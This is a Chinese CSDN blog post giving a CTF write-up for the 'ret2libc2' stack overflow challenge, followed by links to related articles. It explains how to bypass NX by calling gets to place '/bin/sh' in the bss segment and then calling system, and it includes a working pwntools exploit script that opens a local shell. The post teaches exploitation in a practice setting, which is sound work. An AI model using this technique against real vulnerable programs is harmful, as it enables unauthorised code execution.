Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR

最新推荐文章于 2024-04-07 19:07:29 发布
最新推荐文章于 2024-04-07 19:07:29 发布
阅读量2.2k 收藏 9
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq742762377/article/details/84314647
版权

和Ret2Libc(1)一样,先把程序扔进IDA看看代码

 

 和Ret2Libc(1)一样,gets存在溢出漏洞

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

可以看到程序开启了NX,

我的linux已经开启了ASLR

存在system函数,地址为 0x08048490

不存在‘/bin/sh'字段

 

漏洞利用思路:

程序中既然找不到‘/bin/sh‘,那我们就需要想办法输入进去,恰好用objdump发现存在gets函数 ,地址为0x08048460

而且还存在也就说明,我们可以手动把shellcode输入进去,然后存放进bss段里面,最后把这个bss地址传给system来调用shellcode

1、用gets的地址覆盖函数返回地址

2、构造gets的返回地址,(因为gets输入shellcode后,我们就要调用system函数来getshell,所以gets的返回地址是system函数的调用地址,即system_plt)

3、构造gets需要的参数(就是存放输入字符串的地址,bss段0x804A080)

4、构造system的参数(就是存放输入字符串的地址,bss段0x804A080)

 

exp:

from pwn import *
bss_addr = 0x0804A080
gets_plt = 0x08048460
sys_plt  = 0x08048490

io=process('./ret2libc2')
io.recvuntil('What do you think ?')
payload = 'A'*112 + p32(gets_plt) + p32(sys_plt) + p32(bss_addr) + p32(bss_addr)
io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()

 

X丶
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc2
m0_49959202的博客
08-06 176
文章目录ret2libc21.程序分析2.栈帧构造2.1 第一种构造方式2.2 第二种构造方式3.exp编写 ret2libc2 当前的ret2libc2:有system,无”\bin\sh“ 1.程序分析 找个题和ret2libc1差不多,区别在于程序里面没有现成的"/bin/sh"字符串。 首先checksec一下: file一下: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ss8LRj6L-1628251397723)(https://i.loli.net/2
ret2libc(可绕NX但不可绕PIE和ASLR,因为PIE会使ELF本身随机化,ASLR会使libc.so基址随机化)
EternalBurning的博客
11-12 404
ret2libc能直接找到system和/bin/shchecksec泄漏点偏移libc调用exp找不到/bin/shchecksec检查漏洞函数确认偏移查找是否有系统调用字符串 能直接找到system和/bin/sh checksec 泄漏点 偏移 108+4=112 libc调用 程序中有外部引入system()函数 所以我们接下来找/bin/sh就可以了 exp 找不到/bin...
【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 2941
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
ret2libc
最新发布
2301_79863983的博客
04-07 650
以wiki中的libc的第三道例题为例,理解libc
Linux_x86下NXASLR绕过技术(续)
weixin_30809333的博客
11-03 250
四、Stack Canaries 首先看一下Stack Canaries演进历史: Stack Guard 是第一个使用 Canaries 探测的堆栈保护实现,它于 1997 年作为 GCC 的一个扩展发布。最初版本的 Stack Guard 使用 0x00000000 作为 canary word。尽管很多人建议把 Stack Guard 纳入 GCC,作为 GCC 的一部分来提供堆栈保护。...
Ret2libc
iextract的博客
04-24 654
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc2pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
栈溢出基本ROP绕过ASLRNX保护
ditto的博客
12-28 3498
菜鸡刚学rop,总结下,算是对蒸米大佬这篇文章最后一个样例的一点解释说明。 笔记中的程序源代码来自 蒸米大佬的x86一步一步学rop http://www.vuln.cn/6645 计算溢出点的位置的脚本可以在大佬的github上下载(其实从IDA上也可以计算出来溢出点) https://github.com/zhengmin1989/ROP_STEP_BY_STEP 预备知识: 了解动态链接中P...
libc system函数的探究
theArcticOcean
07-29 1553
system导致父进程等待 在mac上的在线帮助有对system的如下说明: The system() function hands the argument command to the command interpreter sh(1). The calling process waits for the shell to finish executing the c...
坏的解释器: 没有那个文件或目录/bin/sh
热门推荐
bad_good_man的专栏
10-28 1万+
坏的解释器: 没有那个文件或目录/bin/sh shell脚本运行时,提示“坏的解释器: 没有那个文件或目录/bin/sh”,经过排查,原因为: shell脚本是在windows环境下编辑的(编辑软件为:notepad++),到Linux下后成为了杂乱的文本.
栈溢出原理和绕过技术 | NX、CANARY、ASLR、RELRO
Sakura给爷pwn全场
12-16 833
GitHub: https://github.com/ylcangel/binary_vulnerability/
canary介绍与绕过技巧
0pt1mus
04-02 6437
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手,当...
ret2syscall
qq_33769475的博客
12-15 1924
漏洞分析 题目ret2syscall 查看保护,开启了NX保护,不能ret2shellcode ┌──(root????e267254b2ec9)-[/home/ret2sys] └─# checksec rop [*] '/home/ret2sys/rop' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE:
ret2libc3_通过 ROP 绕过 DEP 和 ASLR 防护
Jc
05-08 768
题目:link > 2jfn 引 ROP的全称为 Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 常见的程序流劫持就是栈溢出,格式化字符串攻击和堆溢出。 通过程序流劫持,攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击,系统防御者也提出了各种防御方法,最常见的...
服务器 系统目录 /bin 丢失导致无法启动
精哥哥
10-15 1733
挂盘查看系统目录 /bin丢失导致无法启动 centos 7系统系统上bin目录是一个软连接,源文件 /usr/bin是存在的,重新建立软链接后恢复正常。 centos创建软链接: sudoln -susr/bin bin 必要参数: -b 删除,覆盖以前建立的链接 -d 允许超级用户制作目录的硬链接 -f 强制执行 -i 交互模式,文件存在则提示用户是否覆盖 -n ...
Ret2libc攻击的防御策略有哪些
06-11
Ret2libc攻击是一种利用栈溢出漏洞来获取系统控制权的攻击方法,其中libc库函数被用于构造恶意代码。为了防止这种攻击,可以采取以下措施: 1. 栈溢出漏洞修复:修复栈溢出漏洞是防止Ret2libc攻击的最根本方法,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值